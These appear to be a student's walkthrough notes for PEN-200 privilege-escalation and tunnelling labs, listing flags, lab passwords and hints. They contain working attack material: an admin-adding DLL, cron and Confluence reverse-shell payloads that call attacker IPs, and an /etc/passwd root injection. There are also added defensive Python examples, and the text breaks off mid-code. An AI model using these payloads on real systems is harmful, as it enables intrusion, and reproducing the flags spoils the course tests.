2. Use the command provided in listing 18 to search for text files in C:\users directory.

Command

3. Connect to CLIENTWK221 (VM #2) via RDP as user mac with the password IAmTheGOATSysAdmin! and locate
sensitive information on the system to elevate your
privileges. Once found, use the credentials to access the system as this
user and find the flag on the Desktop.

Answer

intruder

View hints

HINT

1. Use the command provided in listing 18 to search for files in C:\users directory.
2. Decode the content of the file you have found.
3. Use runas command as shown in figure 3 to connect with the new credentials.

Command

16.1.4. Information Goldmine PowerShell

Windows Privilege Escalation - Information Goldmine PowerShell - VM #1

Windows Privilege Escalation - Information Goldmine PowerShell - VM #2

Labs
1. Follow the steps above and obtain an interactive shell as
daveadmin on CLIENTWK220 (VM #1). Enter the flag, which can be found on the desktop.

Answer

OS{aafbb95985ae290a37d9ad9411e64c32}

View hints

HINT

1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. To obtain the flag follow the steps provided in 16.1.4 learning unit.

Command

2. Connect to CLIENTWK220 (VM #1) as daveadmin via RDP. Use the Event Viewer to search for events recorded by
Script Block Logging. Find the password in these events.

Answer

ThereIsNoSecretCowLevel1337

View hints

no hints

Command

3. Connect to CLIENTWK221 (VM #2) via RDP as user mac with the password IAmTheGOATSysAdmin!. Enumerate the
machine and use the methods from this section to find the flag.

Answer

OS{f8932802863c899c03036bbcec8ae012}

View hints

HINT

Refer to the commands used in Listings 26, 27 and 28.

Command

16.1.5. Automated Enumeration

Windows Privilege Escalation - Automated Enumeration - VM #1

Labs
1. Follow the steps from this section and examine the output headlined

Checking for DPAPI Credential Files. Enter one of the MasterKeys as answer.

Answer

1a65c284-d429-4e6b-b7ab-5fc1a2d95636

View hints

HINT
1. Begin by running WinPEAS on VM #1. Look for the 'Checking for DPAPI Credential Files' section and then the
masterkeys in the output.
2. Alternatively, you can redirect the output to a text file using the > operator and search for the masterkeys.

Command

cp /usr/share/peass/winpeas/winPEASx64.exe .

python3 -m http.server 80

nc 192.168.45.239 4444

powershell

iwr -uri http://192.168.48.3/winPEASx64.exe -Outfile winPEAS.exe

.\winPEAS.exe > 1.txt

We read the file and search for 'Checking for DPAPI Credential Files'.

The first entry under 'Checking for DPAPI master keys' is our answer.

2. Download a precompiled version of Seatbelt or compile it yourself. To find a precompiled version of Seatbelt, you can
enter the search term compiled seatbelt github download in a search engine. Transfer the binary to VM #1 and launch
it with the option -group=all. Find a section named InstalledProducts and locate the entry for XAMPP. Enter the value of
DisplayVersion as answer to this exercise.

Answer

7.4.29-1

View hints

HINT

1. After downloading Seatbelt.exe on your local VM, transfer it to your assigned VM #1 by using iwr as shown in
listing 34.
2. Run Seatbelt.exe on powershell with the -group=all argument and search for the section named
InstalledProducts.

Command

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/tree/master

From this URL I download Seatbelt.exe and we drop it onto our host.

16.2.1. Service Binary Hijacking

Windows Privilege Escalation - Service Binary Hijacking - VM #1

Windows Privilege Escalation - Service Binary Hijacking - VM #2

Labs
1. Follow the steps outlined in this section on
CLIENTWK220 (VM #1) to replace the service binary of the service mysql. Enter the flag, which can be found on the
desktop of user daveadmin.

Answer

OS{d9607c2408f5bafd1fd2bcd1f0aea84b}

View hints

HINT

1. Follow the steps provided in this learning unit to obtain the shell as user dave2.
2. If you encounter any issues while using RunAs, you can try running an Administrator command prompt and
entering the credentials for user dave2 to obtain a shell.

Command

We launch PowerShell as administrator.

2. Connect to CLIENTWK221 (VM #2) via RDP as user milena with the password MyBirthDayIsInJuly1!. Find a service in
which milena can replace the service binary. Get an interactive shell as user running the service and find the flag on the
desktop.

Answer

OS{1684288b03c6c5c3b674d6a0b706514c}

View hints

HINT

1. Import PowerUp.ps1 to identify a service to modify.
2. Replace the service's executable with a malicious binary renamed to match.
3. Restart the service to trigger the malicious binary and gain shell access.
4. The flag is on roy user's desktop.

Command

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

We move this program somewhere else,

download from our own host the user-adding payload written in C,

and drop that program where BackupMonitor.exe was, renamed to exactly the same name.

Because we could not reload the program and because it is in autoload mode, we reboot the host; when it comes back up this
service runs and creates a new user for us.

We connect as the new user.

As this user we launch PowerShell with administrator rights and grab the flag.

16.2.2. DLL Hijacking

Windows Privilege Escalation - DLL Hijacking - VM #1 192.168.207.220

Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to identify the missing DLL, cross-compile your own DLL, and place it in a directory that it gets
executed when the service FileZilla FTP Client is started. After placing the malicious DLL wait several minutes for a
high privileged user to start the application, obtain code execution, an interactive shell, or access to the GUI and enter
the flag, which can be found on the desktop of daveadmin.

Answer

OS{ad7e94d806def8b5191812f869bf6b56}

View hints

HINT

1. Follow the steps in this learning unit.
2. Install mingw-w64 with the command: sudo apt install mingw-w64 .
3. If you encounter any issues with RunAs, try running an Administrator command prompt and entering dave2's
credentials to obtain a shell.

Command

We launch it via the backupadmin user.

With this filter we view only this specific app.

With this filter we view the operations.

With this filter we view specific files, for example DLLs.

We saw that it uses TextShaping.dll.

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD ul_reason_for_call,  // Reason for calling function
    LPVOID lpReserved)         // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
        i = system("net user dave3 password123! /add");
        i = system("net localgroup administrators dave3 /add");
        break;
    case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH: // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

We download it onto the target host.

FOR OUR DLL FILE TO WORK, THE CODE INSIDE THE DLL FILE EXECUTES ONLY IF A HIGH-PRIVILEGED USER RUNS FILEZILLA; IN OUR
CASE, WHEN I STARTED THE PROGRAM VIA THE BACKUPADMIN USER, THE DAVE3 USER WAS ADDED.

16.2.3. Unquoted Service Paths

Windows Privilege Escalation - Unquoted Service Paths - VM #1

Windows Privilege Escalation - Unquoted Service Paths - VM #2

Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to exploit the unquoted service path of GammaService. Obtain code execution, an interactive
shell, or access to the GUI as an administrative user and find the flag on the desktop of daveadmin.

Answer

OS{a2e0c8eff0b326c4766396489a780115}

View hints

HINT

1. Follow the steps in this learning unit.
2. If you encounter any issues with RunAs, try running an Administrator command prompt and entering dave2's
credentials to obtain a shell.

Command

With this command we view all services,

and we find this unusual service.

And this script is the command for viewing these unusual services in CMD.EXE.

We try starting GammaService and it runs for us; we try stopping it and it stops.

We check the permissions of the C:\ drive, Program Files, and Program Files\Enterprise Apps.
Then we drop adduser.exe onto the target host renamed to Current.exe, copy it into Program Files\Enterprise Apps\, and when
we start GammaService again, the dave2 user it contains appears for us.

We launch PowerShell as john with administrator rights and capture the flag.

2. Connect to CLIENTWK221 (VM #2) via RDP as user damian with the password ICannotThinkOfAPassword1!.
Enumerate the services and find an unquoted service binary path containing spaces. Exploit it with methods from this
section and obtain an interactive shell as the user running the service. Find the flag on the desktop.

Answer

OS{e2cac2f755b01cecd870cfe72a4b467e}

View hints

HINT

1. Use the provided command in listing 66 to find unquoted service paths containing spaces.
2. Use the provided command in listing 69 to check write permissions.
3. Replace the service's executable with a malicious binary renamed to match, and restart the service.

Command

With this command we view the ReynhSurveillance service.

With this command we view the PATH.

We view the permissions of this path.

With this command we build the payload.

With this command we bring up an HTTP web server.

With this command we download it onto the target host via PowerShell.

nc -nlvp 4444

and we reload the service we loaded the payload into.

We got a shell as the roy user.
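The unquoted-path ambiguity both labs rely on can be traced without a Windows host. Added Python example, not from the notes: it assumes the GammaService binary lives at C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe (inferred from the Current.exe step above) and lists the paths the service control manager probes, the directories an administrator has to keep non-writable, and the quoted ImagePath that fixes the service.

```python
"""Resolution order for an unquoted Windows service ImagePath.

Added example, not part of the original notes. Given a service's ImagePath,
it lists the executables Windows tries in order when the path is unquoted
and contains spaces, the directories an administrator must therefore keep
non-writable for standard users, and the quoted ImagePath that removes the
ambiguity. The GammaService path is assumed from the lab text above; the
other paths are constructed samples.
"""
import ntpath

EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd"}


def _fragments(image_path):
    """Yield (fragment, rest) for every space-separated split of the path."""
    words = image_path.split(" ")
    for n in range(1, len(words) + 1):
        yield " ".join(words[:n]), " ".join(words[n:])


def unquoted_path_candidates(image_path):
    """Executables tried, in order, for an unquoted ImagePath.

    At each space the text before it is tried as the program (".exe" is
    appended when that fragment has no extension) and the remainder as its
    arguments, stopping at the first fragment that names an executable,
    which is the intended binary and the last entry of the list. A quoted
    path has exactly one candidate.
    """
    if image_path.startswith('"'):
        return [image_path[1:].partition('"')[0]]
    candidates = []
    for fragment, _rest in _fragments(image_path):
        _root, ext = ntpath.splitext(fragment)
        candidates.append(fragment if ext else fragment + ".exe")
        if ext.lower() in EXECUTABLE_EXTS:
            break
    return candidates


def directories_to_audit(candidates):
    """Directories where a planted file would win over the real binary.

    Every candidate except the last lives in one of these; they must not be
    writable by standard users (check with icacls, as the course does).
    """
    dirs = []
    for cand in candidates[:-1]:
        d = ntpath.dirname(cand)
        if d not in dirs:
            dirs.append(d)
    return dirs


def quoted_image_path(image_path):
    """Remediation: quote the binary and keep any arguments, so the service
    control manager no longer has to guess where the program name ends."""
    if image_path.startswith('"'):
        return image_path
    for fragment, rest in _fragments(image_path):
        if ntpath.splitext(fragment)[1].lower() in EXECUTABLE_EXTS:
            return '"%s"' % fragment + (" " + rest if rest else "")
    raise ValueError("no executable found in ImagePath: %r" % image_path)


if __name__ == "__main__":
    # Assumed to match the lab's GammaService binary path.
    path = r"C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe"
    for cand in unquoted_path_candidates(path):
        print("tries:", cand)
    print("audit write access on:", directories_to_audit(unquoted_path_candidates(path)))
    print("fixed ImagePath:", quoted_image_path(path))
```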

16.3.1. Scheduled Tasks

Windows Privilege Escalation - Scheduled Tasks - VM #1

Windows Privilege Escalation - Scheduled Tasks - VM #2

Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to exploit the scheduled task CacheCleanup by replacing the binary specified as action. Obtain
code execution, an interactive shell, or access to the GUI as administrative user and find the flag on the desktop of
daveadmin.

Answer

OS{98c842ccc693d582ef7514eb2ea5d17b}

View hints

HINT

1. Follow the steps in this learning unit.
2. Install mingw-w64 with the command: sudo apt install mingw-w64 .
3. If you encounter any issues with RunAs, try running an Administrator command prompt and entering dave2's
credentials to obtain a shell.

Command

schtasks /query /fo LIST /v

From here we view the cachecleanup task.

We download the payload from our machine,

rename the original app,

and upload our payload in its place.

After 1 minute the scheduled task runs and creates dave2 for us.

Using this user we launch PowerShell with administrator rights and find the flag.

2. Connect to CLIENTWK221 (VM #2) via RDP as the user moss with the password work6potence6PLASMA6flint7.
Enumerate the scheduled tasks on the system and find a way to obtain an interactive shell as user running the
scheduled task. The flag can be
found on the desktop.

Answer

OS{266728a24179875d118a6193448d7138}

View hints

HINT

1. Enumerate scheduled tasks with the command provided in listing 75.
2. If you have write permissions for the executable, replace or modify it to execute your code, such as an msfvenom
shell. Obtain the flag when the scheduled task is triggered.

Command

We adapted our payload to the task's app and loaded it.

We renamed the original app.

We copied our payload in its place.

After 1 minute it created the dave2 user for us.

And using this user's credentials we launched a terminal with administrator rights and found the flag.

16.3.2. Using Exploits

Windows Privilege Escalation - Using Exploits - VM #1

Windows Privilege Escalation - Using Exploits - VM #2

Windows Privilege Escalation - VM #3

Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1). Use the CVE-2023-29360 exploit located on the Desktop of the steve user to elevate your
privileges to NT AUTHORITY\SYSTEM and find the flag on the desktop of daveadmin.

Answer

OS{2fe06e42bb244b955f4bc8aa6c67d4b1}

View hints

HINT

Follow the steps in this learning unit.

Command

It turns out this version of Windows 11 has a vulnerability.

2. Follow the steps from this section on CLIENTWK220 (VM #2). Use SigmaPotato
to obtain code execution, an interactive shell, or access to the GUI as
administrative user and find the flag on the desktop of
daveadmin.

Answer

OS{374c302d52d68f68a7c31e5604206b5e}

View hints

HINT

Follow the steps in this learning unit.

Command

I was supposed to do this task with the SigmaPotato tool, but since SeImpersonatePrivilege was enabled for the dave user,
I used the ready-made CVE that was sitting there to escalate to the nt auth./system user and found the flag (the SigmaPotato
tool can be used on users that have the SeImpersonatePrivilege right enabled).

3. Capstone Lab: Get access to CLIENTWK222
(VM #3) by connecting to the bind shell on port 4444. Use the methods
covered in this Module to elevate your privileges to an administrative
user. Enter the flag, which is located in
C:\Users\enterpriseadmin\Desktop\flag.txt.

Answer

OS{7ae5b3cefee976cbac3ce6b508854147}

View hints

no hints

Command

Here I looked at the user's privileges; the SeImpersonatePrivilege right we needed was not there.

And I went into our user's home dir.

Here I got information about the OS.

And I took a chance and uploaded the CVE from my own host; when I ran the CVE I got the nt auth./system user and captured the flag.

17. Linux Privilege Escalation


17.1.2. Manual Enumeration

Linux Privilege Escalation - Manual Enumeration - VM #1

Linux Privilege Escalation - Manual Enumeration - VM #2

Labs
1. Connect to VM 1 with the provided credentials and replicate the manual enumeration techniques covered in this
section. Inspect the target's OS information and its release details.
What is the Linux distribution codename?

Answer

buster

View hints

HINT

Use command provided in listing 5 to retrieve the VERSION_CODENAME of the Linux distribution.

Command

2. What crontab parameter is needed to list every cron job for the current user?

Answer

-l

View hints

HINT

Refer to the command shown in listing 12 to identify the parameter required for displaying all the cron jobs for the
current user.

Command

3. What is the inherited UID called that allows a given binary to be executed with root permissions even when launched by
a lower-privileged user?

Answer

eUID

View hints

HINT

1. Understand the roles of UID/GID in executing a binary.
2. Identify what the inherited UID is referred to when using SUID.
3. The answer is a four-letter acronym relating to effective user identity.

Command

4. Connect to VM 2 with the provided credentials. The flag is inside one of the SUID binaries available on the system.

Answer

OS{698276246914c02e5933a41eee3bd2cd}

View hints

HINT

1. Use the command provided in listing 20 to identify SUID files on the system.
2. If you discover an unusual SUID binary, you can try running the 'strings' command on it to extract any readable
text or strings.

Command

With this command we found the files with the SUID flag set, and we have passwd_flag.

17.1.3. Automated Enumeration

Linux Privilege Escalation - Automated Enumeration - VM #1

Labs
1. Connect to VM 1 with the provided credentials and run
unix-privesc-check in standard mode.
The flag is inside a file that normally should not be world-writable.

Answer

OS{06b3650ededbb02dc52ba68d5d90e8e4}

View hints

HINT

1. Run the 'unix-privesc-check' tool in standard mode to find world-writable files on a Unix system.
2. Once you find a world-writable file, read the file with the "cat" command in order to find the flag.

Command

https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz

We download the tool from this URL onto our machine and start a Python HTTP web server.

From our host we download this tool onto the target host and extract it from the tar.

And we run this tool with the standard option and redirect its output to a file.

In our TXT file we find the lines marked critical, and we have 2 outputs.

The 2nd one contains our flag.

17.2.1. Inspecting User Trails

Linux Privilege Escalation - Inspecting User Trails - VM #1

Linux Privilege Escalation - Inspecting User Trails - VM #2

Labs
1. Connect to the VM 1 and repeat the steps learned in this section.
Which command is used to list
sudoer capabilities for a given user?

Answer

sudo -l

View hints

HINT

Use the command provided in listing 31 to learn how to list the sudoer capabilities for a particular user.

Command

no commands

2. Connect to the VM 2 machine with the provided credentials and try to get the flag that resides under another user's file.

Answer

OS{861410c43ac1d05a1afe39908fe300e7}

View hints
HINT

1. Connect to VM #2 with SSH using the provided credentials.
2. Identify the cron jobs running using the command provided in listing 35.
3. Once you've identified a suitable cron job, modify it with a reverse shell payload as shown in listing 37.

Command

17.2.2. Inspecting Service Footprints

Linux Privilege Escalation - Inspecting Service Footprints - VM #1

Linux Privilege Escalation - Inspecting Service Footprints - VM #2

Labs
1. Connect to VM 1 and repeat the steps discussed in this section.
Which utility is used to constantly inspect the output of the
ps command?

Answer

watch

View hints

HINT

Check out listing 33 to see an example of how to continuously monitor the output of the 'ps' command for changes.

Command

no commands

2. Connect to VM 2 as the joe user and retrieve the flag using one
of the methods explained in this section.

Answer

OS{9a3bc338ac5f764953fe6148400b9a47}

View hints

HINT

1. Look at the list of running processes on the system.
2. Use the provided command in listing 6 - "Manual Enumeration" on how to use the 'ps' command to display the
running processes and their associated details.

Command

17.3.1. Abusing Cron Jobs

Linux Privilege Escalation - Abusing Cron Jobs - VM #1

Linux Privilege Escalation - Abusing Cron Jobs - VM #2

Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which log file holds
information about cron job activities? Include the full path in the answer.

Answer

/var/log/syslog

View hints

HINT

Examine listing 35 to find out which log file contains information about cron job activities.

Command

2. Connect to VM 2 and look for another misconfigured cron job. Once found, exploit it and obtain a root shell in order to
get a flag.

Answer

OS{9cd5866b2f5efb558df378e082539019}

View hints

HINT

1. Connect to VM #2 with SSH using the provided credentials.
2. Identify the cron jobs running using the command provided in listing 35.
3. Once you've identified a suitable cron job, modify it with a reverse shell payload as shown in listing 37.

Command

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f" >> <CRONJOB>.sh

17.3.2. Abusing Password Authentication

Linux Privilege Escalation - Abusing Password Authentication - VM #1

Linux Privilege Escalation - Abusing Password Authentication - VM #2

Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which hashing
algorithm has been used to encrypt the attacker's password?

Answer

crypt

View hints

HINT

To identify the hashing algorithm used for the attacker's password, refer to footnote #2 in this learning unit.

Command

2. Connect to VM 2 and get the flag by elevating to a root shell through password authentication abuse.

Answer

OS{188ef1092e2abc8683299b36712ecdb4}

View hints

HINT

Use the commands provided in the listing 39.

Command

17.4.1. Abusing Setuid Binaries and Capabilities

Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #1

Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #2

Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which utility can we use
to manually search for misconfigured capabilities?

Answer

getcap

View hints

HINT

1. Connect to VM 1 with SSH using the provided credentials.
2. To discover the utility used for manually searching for misconfigured capabilities, use the command provided in
listing 46.
3. Only submit the command name, not the full path, as an answer.

Command

2. Connect to VM 2 and gain a root shell by abusing capabilities.

Answer

OS{2400406987fc1be328d3296620505070}

View hints

no hints

Command

17.4.2. Abusing Sudo

Linux Privilege Escalation - Abusing Sudo - VM #1

Linux Privilege Escalation - Abusing Sudo - VM #2

Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which kernel modules
enforce MAC policies to further protect the system?

Answer

AppArmor

View hints

HINT

Review the command output provided in listing 48 and listing 54 in this learning unit. Additionally, check footnote #5.

Command

2. Connect to VM 2 and gain a root shell by abusing a sudo misconfiguration.

Answer

OS{b095e10c79783099cc7870e3172792a8}

View hints
HINT

1. Use the provided command in listing 48 to determine which commands can be executed with sudo privileges.
2. Check GTFOBins (https://gtfobins.github.io/) for instructions on exploiting the sudo permissions to escalate
privileges to root.

Command

17.4.3. Exploiting Kernel Vulnerabilities

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #1

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #2

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #3

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #4

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #5

Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. What is the name of the
compiler used to generate the exploit's executable file?

Answer

gcc

View hints

HINT

Review the command provided in listing 61 to determine the name of the compiler utilized to generate the exploit executable file.

Command

2. Capstone Lab: Connect to VM 2 with the provided credentials and gain a root shell by abusing a different kernel
vulnerability.

Answer

OS{5d40405d835e901ae6997314852b44e0}

View hints
HINT

1. Enumerate the version of the system (command shown in Listing 5).
2. Check SUID binaries (command shown in Listing 20) and their versions.
3. Search for vulnerable exploits based on the discovered versions.
4. The flag is located in /root/flag.txt.

Command

https://github.com/ly4k/PwnKit/blob/main/PwnKit.sh

We copy our bash script into the 1.sh file, run it, and find the flag.

3. Capstone Lab: Connect to the VM 3 with the provided credentials and use an appropriate privilege escalation
technique to gain a root shell and read the flag.

Answer

OS{707b50696bb39862dde492904d3efddf}

View hints

HINT

1. Start by enumerating cronjobs using the techniques taught in Manual Enumeration - Listings 11 and 12.
2. Once you have identified a suitable cronjob, proceed to exploit it using the techniques taught in the Abusing Cron Jobs learning unit.

Command

It turns out we have an archiver job.

We read the contents of that archiver job and add the command “chmod u+s /bin/bash”, which sets the SUID flag, to archive.sh; after a short while the s flag is added to /bin/bash, and through the /bin/bash -p command we can obtain root privileges.

4. Capstone Lab: On the Module Exercise VM 4, use another appropriate privilege escalation technique to gain access
to root and read the flag. Take a closer look at file permissions.

Answer

OS{74a1ccae5c8109649246d7b5d0b05030}

View hints

HINT

1. Begin by enumerating all world-writable files on the system using the technique in Manual Enumeration - listing 15.
2. Use the techniques taught in Abusing Password Authentication to abuse the write permissions on these files and escalate privileges.

Command

find / -writable -type f 2>/dev/null | tail

openssl passwd <password>

echo "root2:<Openssl encrypted password>:0:0:/root:/bin/bash" >> /etc/passwd

su root2
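
The commands above add a second UID-0 user with an inline password hash to a writable /etc/passwd. As an added defensive example (not part of the PEN-200 course or these notes), the following script audits a passwd file for exactly that pattern: a non-root account with UID 0, a hash stored in the password field instead of "x", or an empty password field. The sample file contents and the hash are constructed placeholders.

```python
"""Audit /etc/passwd for the privilege-escalation pattern described above:
an extra UID-0 user whose password hash is stored inline in the file.

Added defensive example, not part of the PEN-200 course. The sample file
contents are constructed and the hash is a fake placeholder.
"""
from dataclasses import dataclass
from typing import List

# Constructed sample: a normal file plus the appended "root2" line the
# notes describe (inline crypt hash, uid 0, gid 0, root's home and shell).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
joe:x:1000:1000:Joe User,,,:/home/joe:/bin/bash
root2:$1$constructed$FAKEHASHPLACEHOLDER000000:0:0:root2:/root:/bin/bash
"""

# Password-field values that mean "no usable password here" on Linux.
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious passwd entry, in file order."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, fields[0], "malformed entry (expected 7 fields)"))
            continue
        user, pw_field, uid, _gid, _gecos, _home, _shell = fields
        # Any second UID-0 account is a backdoor candidate; the name is arbitrary.
        if uid == "0" and user != "root":
            findings.append(Finding(line_no, user, "extra UID-0 account"))
        # Modern systems keep hashes in /etc/shadow; an inline hash means
        # someone bypassed that, and an empty field means no password at all.
        if pw_field == "":
            findings.append(Finding(line_no, user, "empty password field"))
        elif pw_field not in LOCKED_OR_SHADOWED:
            findings.append(Finding(line_no, user, "password hash stored inline in /etc/passwd"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Finding]:
    """Convenience wrapper for running against a live system."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

Run it as a cron job or from a configuration-management check alongside a file-permission check (`find /etc/passwd -perm -o=w`), since the write permission is the root cause and the extra entry is only the symptom.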

5. Capstone Lab: Again, use an appropriate privilege escalation technique to gain access to root and read the flag on
the Module Exercise VM 5. Binary flags and custom shell are what to look for.

Answer

OS{4e3a7159acfaa293811bfc0c0581730a}

View hints

HINT

1. Begin by listing the SUID binaries, using the commands provided in Manual Enumeration - listing 20.
2. Exploit the SUID binaries using GTFOBins.

Command

find / -perm -4000 2>/dev/null

and from there we find the privilege-escalation command for the gawk program at https://gtfobins.github.io/gtfobins/gawk/

/usr/bin/gawk 'BEGIN {system("/bin/sh")}'

18. Port Redirection and SSH Tunneling


18.2.3. Port Forwarding with Socat

Port Redirection and SSH Tunneling - Port Forwarding with Socat - VM Group

Labs
1. Follow the steps in this section to set up a port forward and gain access to the
confluence database on PGDATABASE01 using psql from your Kali machine. Crack the password of the
database_admin user. What is the plain text password of this account?

Answer

sqlpass123

View hints

HINT

Repeat the steps in this learning unit. If you want to double-check the passwords that you've cracked, you may
refer to listing 13.

Command

https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()")}/

curl http://192.168.125.63:8090/%24{new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash'%2C'-c'%2C'bash -i >%26 /dev/tcp/192.168.45.183/4444 0>%261').start()")}/

We check the IP addresses and routes, open the confluence.cfg.xml file, and view the PostgreSQL credentials and the IP addresses and ports in the internal network.

Using the socat tool we redirect the traffic arriving on port 2345 of our host to PostgreSQL's ip:port.

When we connect to PostgreSQL by entering the IP and port of the listening host, our traffic goes to the PostgreSQL ip:port in the internal network and connects; with \l we list the databases and view the information about the users from every database.

From the user information we take database_admin's hashed credential

and write it into a file.

With this command we find the hashed password.

2. Capstone Lab: Use the password found in the previous question to create a new port forward on CONFLUENCE01
and gain SSH access to PGDATABASE01 as the database_admin user. What's the value of the flag found in
/tmp/socat_flag on PGDATABASE01?

Answer

OS{69b5b616d69ef384dd0daed09f47a82a}

View hints

HINT

1. Use and update the command in listing 10 for connecting to PGDATABASE01's port 22.
2. Confirm proper port forwarding by scanning CONFLUENCE01's open ports with Nmap.
3. SSH into PGDATABASE01 as 'database_admin' via the forwarded port on CONFLUENCE01.

Command

We listen with nc

and use the earlier PoC payload to get a reverse shell.

After getting the reverse shell, we redirect the traffic arriving on port 2222 to IP:22 of the host where PostgreSQL is running.

And when we connect via SSH from our own machine to port 2222 of the first host, giving the second host's user as the username, our traffic is redirected to port 22 of the second host and we connect to its SSH port, and we find the flag in /tmp.

18.3.1. SSH Local Port Forwarding

ssh_local_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/1e4c3abaa24721e69c1359811673c91f-ssh_local_client

ssh_local_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/3517f72efa170f849974e84a250497d6-ssh_local_client_aarch64

Port Redirection and SSH Tunneling - SSH Local Port Forwarding - VM Group 1

Port Redirection and SSH Tunneling - SSH Local Port Forwarding - VM Group 2

Labs
1. Start VM Group 1 and follow the steps in this exercise. What's the flag in Provisioning.ps1?

Answer

OS{8db4999a606f74a8bf6ebc1b644a9e10}

View hints

no hints

Command

We listen with nc

and get a reverse shell via the earlier PoC payload.

We have a reverse shell; then we connect to database_admin via SSH and view its IPs and routes, and from there we identify another internal network inside the internal network and, with a for loop, check which hosts are up on port 445.

After identifying an up host we create an SSH tunnel: here 0.0.0.0:4455 is the listening socket; the next part, the host 172****:445 inside the second network, is the IP and port to which traffic is redirected; and database_admin at the end is the user and IP of the second host. When we press enter, the tunnel stays open.

ssh : This is the command to initiate an SSH connection.

-N : This option tells SSH not to execute a remote command.

-L : This option specifies local port forwarding.

0.0.0.0:4455 : This means that the SSH tunnel will listen on all interfaces on port 4455.

172.16.125.217:4455 : This is the target server (HRSHARES) and port you want to forward traffic to.

[email protected] : This is the user and IP address of the CONFLUENCE01 machine.
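
To make the option breakdown above concrete, here is an added example (not from the PEN-200 course or these notes) that parses an `ssh -N -L` command line into its parts and reports who can reach the listening socket. Binding to 0.0.0.0, as the lab does, means anyone who can reach the Kali host can use the forward, which is the point a defender or a careful operator wants surfaced. The addresses in the sample commands are constructed placeholders (192.0.2.0/24 is a documentation range).

```python
"""Pick apart an OpenSSH local port forward (`ssh -N -L ...`) the way the
option breakdown above does, and report where the listening socket ends up.

Added example, not from the PEN-200 course. The addresses in the sample
commands are constructed placeholders.
"""
import shlex
from dataclasses import dataclass
from typing import Optional

# Options that consume the following argument; skipped so that their value is
# not mistaken for the destination host.
OPTS_WITH_VALUE = {"-p", "-i", "-o", "-l", "-J", "-F", "-D", "-R"}


@dataclass
class LocalForward:
    bind_address: Optional[str]  # None: OpenSSH default, loopback only
    listen_port: int             # port opened on the SSH client
    target_host: str             # where the SSH server connects on our behalf
    target_port: int
    ssh_user: Optional[str]
    ssh_host: str                # the pivot (CONFLUENCE01 in the lab)
    no_command: bool             # -N given: tunnel only, no remote shell


def parse_local_forward(cmdline: str) -> LocalForward:
    argv = shlex.split(cmdline)
    if not argv or not argv[0].endswith("ssh"):
        raise ValueError("not an ssh command line")
    spec: Optional[str] = None
    destination: Optional[str] = None
    no_command = False
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-N":
            no_command = True
        elif arg == "-L":
            i += 1
            spec = argv[i]
        elif arg.startswith("-L"):
            spec = arg[2:]
        elif arg in OPTS_WITH_VALUE:
            i += 1  # skip the option's value
        elif arg.startswith("-"):
            pass    # other boolean flags are irrelevant here
        else:
            destination = arg
        i += 1
    if spec is None or destination is None:
        raise ValueError("need both -L <spec> and a [user@]host destination")
    parts = spec.split(":")
    if len(parts) == 4:
        bind, lport, thost, tport = parts
    elif len(parts) == 3:
        bind = ""
        lport, thost, tport = parts
    else:
        raise ValueError(f"unsupported -L spec: {spec}")
    user, _, host = destination.rpartition("@")
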